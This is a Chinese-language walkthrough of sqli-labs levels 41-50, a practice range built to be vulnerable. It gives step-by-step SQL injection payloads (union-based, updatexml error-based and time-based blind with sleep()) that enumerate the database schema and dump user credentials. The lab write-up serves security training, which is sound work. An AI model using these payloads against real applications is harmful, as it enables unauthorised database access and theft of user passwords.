sqli-labs靶场通关攻略(41-50)

Less-41

1、判断闭合方式

输入?id=1 --+ 必和成功

2、查看回显点

输入?id=-1 union select 1,2,3 --+

得出回显点为2,3

3、查询数据库名

输入?id=-1 union select 1,2,database() --+

4、查询数据库中的表名

输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5、查询users表中的列

输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6、查询users表中所有字段

输入?id=-1 union select 1,2,group_concat(username,'~',password) from users --+

Less-42

1、使用burp suite进行抓包 并发送至repeater

2、查询数据库名

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select database())),1)--+

3、查询数据库中的表

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1)--+

4、查询users表中的列

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users')),1)--+

5、查询users表中所有字段

输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(username,password)from users)),1)--+

Less-43

1、使用burp suite抓包,并发送至repeater

2、查询数据库名

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select database())),1) --+

2、查询数据库中的表名

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

3、查询users表中的列

输入

login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

4、查询users表中所有字段

输入login_user=1')--+&login_password=1') or updatexml(1,concat(1,(select group_concat(username,password) from users)),1) --+

Less-44

1、查看页面回显点

2、查询数据库名

1' union select 1,database(),3 #

3、查询数据库中的表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

4、查询users表中的列

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

5、查询users表中所有字段

1' union select 1,group_concat(username,password),3 from users #

Less-45

本题除了闭合方式外与44题一样,本题闭合方式为 ' ) ,其余操作可参考44题

Less-46

1、输入?sort=1 页面闭合成功

2、查询数据库名

输入?sort=1 and updatexml(1,concat(1,(select database())),1)

3、查询数据库中的表名

输入?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

Less-47

1、输入?sort=1' --+ ,页面闭合成功

2、查询数据库名

输入?sort=1' and updatexml(1,concat(1,(select database())),1)--+

3、查询数据库中的表名

输入?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

Less-48

1、输入?sort=1 页面闭合成功

2、查询数据库名

输入?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

对比ascii表得出,第一个字符为's'

在以此类推,得出数据库长度为'security'

3、查询数据库中的表名

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

页面延迟三秒访问

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

页面正常响应

可以得出第一个字符为101,在对比ascii表得出,第一个字符为'e'

以此类推,得出第一个表名为'email'

Less-49

1、输入?sort=1' --+ 页面闭合成功

2、查询数据库名

输入?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

对比ascii表的得出数据库的第一个字符为's'

再以此类推,得出数据库全名为'security'

3、查询数据库中的表名

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常回显

说明第一个字符的ascii值为101,对比ASCII表,得出第一个表的第一个字符为'e'

在以此类推,得出第一个表名为'email'

Less-50

1、输入?sort=1

2、查询数据库名

输入?sort=1 and updatexml(1,concat(1,(select database())),1)

3、查询数据库中的表

输入?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

相关推荐
Raymond运维2 小时前
MariaDB源码编译安装(二)
运维·数据库·mariadb
沢田纲吉2 小时前
🗄️ MySQL 表操作全面指南
数据库·后端·mysql
RestCloud17 小时前
SQL Server到Hive:批处理ETL性能提升30%的实战经验
数据库·api
RestCloud18 小时前
为什么说零代码 ETL 是未来趋势?
数据库·api
ClouGence20 小时前
CloudCanal + Paimon + SelectDB 从 0 到 1 构建实时湖仓
数据库
DemonAvenger1 天前
NoSQL与MySQL混合架构设计:从入门到实战的最佳实践
数据库·mysql·性能优化
AAA修煤气灶刘哥2 天前
后端人速藏!数据库PD建模避坑指南
数据库·后端·mysql
RestCloud2 天前
揭秘 CDC 技术:让数据库同步快人一步
数据库·api
得物技术2 天前
MySQL单表为何别超2000万行?揭秘B+树与16KB页的生死博弈|得物技术
数据库·后端·mysql